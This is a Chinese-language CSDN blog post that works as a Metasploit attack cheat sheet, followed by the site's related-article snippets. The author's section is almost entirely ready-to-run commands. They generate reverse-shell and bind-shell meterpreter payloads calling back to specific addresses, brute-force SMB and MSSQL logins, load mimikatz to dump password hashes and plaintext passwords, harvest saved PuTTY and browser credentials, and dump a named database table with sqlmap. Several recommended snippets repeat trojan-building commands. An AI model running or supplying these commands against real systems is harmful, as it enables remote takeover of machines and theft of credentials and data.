msf成功的东西

最新推荐文章于 2022-11-03 08:23:27 发布
最新推荐文章于 2022-11-03 08:23:27 发布
阅读量1k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/50616276
版权

成功生成反弹型payload :

              (1)msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe

              (2)msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
              (3)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f elf> /home/niexinming/shell.elf
              (4)msfvenom -p python/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 > /home/niexinming/shell1.py
成功生成监听型payload  msfvenom -a x86 --platform win -p windows/meterpreter/bind_tcp LPORT=5566 -f exe x> /home/niexinming/bind.exe

http://wooyun.org/bugs/wooyun-2010-0135828
http://www.2cto.com/Article/201211/165910.html
https://www.91ri.org/8476.html
https://www.91ri.org/5462.html
生成的payload http://netsec.ws/?p=331
powershell https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/
meterpreter加载mimikatz 抓HASH 抓明文密码 http://qqhack8.blog.163.com/blog/static/114147985201473111222189/
连接数据库:http://blog.csdn.net/hope_smile/article/details/43932975


本地监听,反弹后的控制端:use exploit/multi/handler

扫描端口:use auxiliary/scanner/portscan/tcp

扫描smb 判断主机:use auxiliary/scanner/smb/smb_version

(重要)爆破smb密码:use auxiliary/scanner/smb/smb_login

爬虫:auxiliary/crawler/msfcrawler
判断存活主机:meterpreter > run arp_scanner -r

meterpreter > load mimikatz   //加载法国神器

meterpreter > run getgui -f 12345 -e //反弹远程桌面(把远程的3389端口反弹到本地的12345来,然后在本地直接 rdesktop 127.0.0.1:12345)

proxychains python '/home/software/sqlmap/sqlmap.py' -r "~/要拖的裤子/hehe1.txt" -D "QINQIONG" -T "USERROLEINFO" --dump

寻找局域网里面匿名ftp auxiliary/scanner/ftp/anonymous
寻找putty保存的密码meterpreter > run enum_putty
寻找ie保存的密码meterpreter > run post/windows/gather/enum_ie
windows的口令:meterpreter > run windows/gather/smart_hashdump
得到本地路由:meterpreter > run get_local_subnets
暴力破解:use auxiliary/scanner/mssql/mssql_login
mssql执行cmd:use auxiliary/admin/mssql/mssql_exec
niexinming
关注
专栏目录
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5878
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
msf生成webshell_用metasploit来生成Powershell后门
weixin_39959615的博客
12-22 1328
在Kali的shell中配置一个Powershell后门,针对Windows的Powershell所设计。root@kali:~# msfconsolemsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_de...
Kali 玩机技巧(杂篇)
最新发布
辉小鱼的博客
11-03 2079
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4338
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
msf连接mysql数据库_msf链接数据库
weixin_31974659的博客
01-27 782
《Metasploit渗透测试手册》—第1章1.8节在Metasploit框架中建立数据库本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第1章1.8节在Metasploit框架中建立数据库,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。1.8 在Metasploit框架中建立数据库Metasploit渗透测试手册Meta...文章异步...
msf连接mysql数据库_kali2.0 MSF连接数据库的问题
weixin_42393650的博客
01-19 805
kali 2.0新版中msf数据库连接问题前言由于kalilinux的版本不同,默认情况下对metasploit和postgresql的配置也不相同,导致我们启动metasploit后连接postgresql数据库会遇到无法连接的情况。下面就三种情况,简单的给大家描述一下,以及遇到问题的解决方案。理想状态理想情况下,只需要两步即可。1.启动postgresqlservice postgresql...
msf 端口扫描
发哥微课堂
02-12 6213
0x00:介绍 msf 端口扫描可以通过两个方式实现,一个是调用 nmap 来扫描目标机的开放端口,一个是利用自带的端口扫描模块来进行扫描。nmap 扫描方式直接在 msf 中输入相应的 nmap 命令即可,msf 模块扫描方式需要调用 auxiliary 下的 scanner 下的 portscan 下的脚本。 0x01:msf 调用 nmap 以 kali 为例,命令行输入 msfcon...
将python扩展到msf
gao646467783的博客
06-01 582
msf框架提供了python的接口,并且网上有好多以Python写的渗透测试代码,尤其是exploit-da等漏洞库中,可不可以把网上的python代码稍稍改动一下放到msf中使用呢(假如根据同一套的逻辑重写一个的话,不仅要对ruby有一些理解,而且要费事的重写)?
msf 提权和清除日志
发哥微课堂
01-17 1585
0x00:介绍 在获取目标系统 shell 后,如果遇到了普通的 user 账户,则在后渗透阶段会有一些局限性,例如获取 hash,修改注册表,装软件等,所以会涉及到接下来的提权操作,由 guest 到 user,最后到 administrator 级别。 0x01:提权 首先查看一下获取 shell 后的权限,进入 meterpreter 后输入 shell 进入目标系统的 cmd,然后输...
msf中使用mimikatz加载用户明文密码
qq_36992014的博客
05-08 870
meterpreter > load mimikatz meterpreter > creds_kerberos 可以获得明文密码 mimikatz 之后改名为kiwi 使用 meterpreter > help kiwi 帮助信息,以后探索
kali2.0配置msf连接postgresql数据库
u014057054的专栏
05-03 8212
1、postgresql启动。 service postgresql start11 2、进入postgresql配置 sudo -u postgres psql alter user postgres with password 'kaliadmin';1212 注意1:’admin’ 这个是密码。  注意2:分号!!!! 一定要带上分号”;”。  注意3:\q:退出数据
msf生成木马
qq_44657899的博客
04-03 4218
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
mimikatz实战域渗透抓取域控管理员密码
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3914
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3369
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1068
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
metasploit成功的渗透一台Windows主机后可以做些什么?
u012049263的博客
08-24 2703
  当使用metasploit成功的渗透一台Windows主机后,你会获得一个Meterpreter 的Shell,那么获取shell之后又能做些什么呢?   成功的获得了Meterpreter的Shell 查看所有会话: sessions -l       注意前面的ID号,你要控制哪个就输入: sessions -i  3 显示目标系统信息 sysinfo...
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2678
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值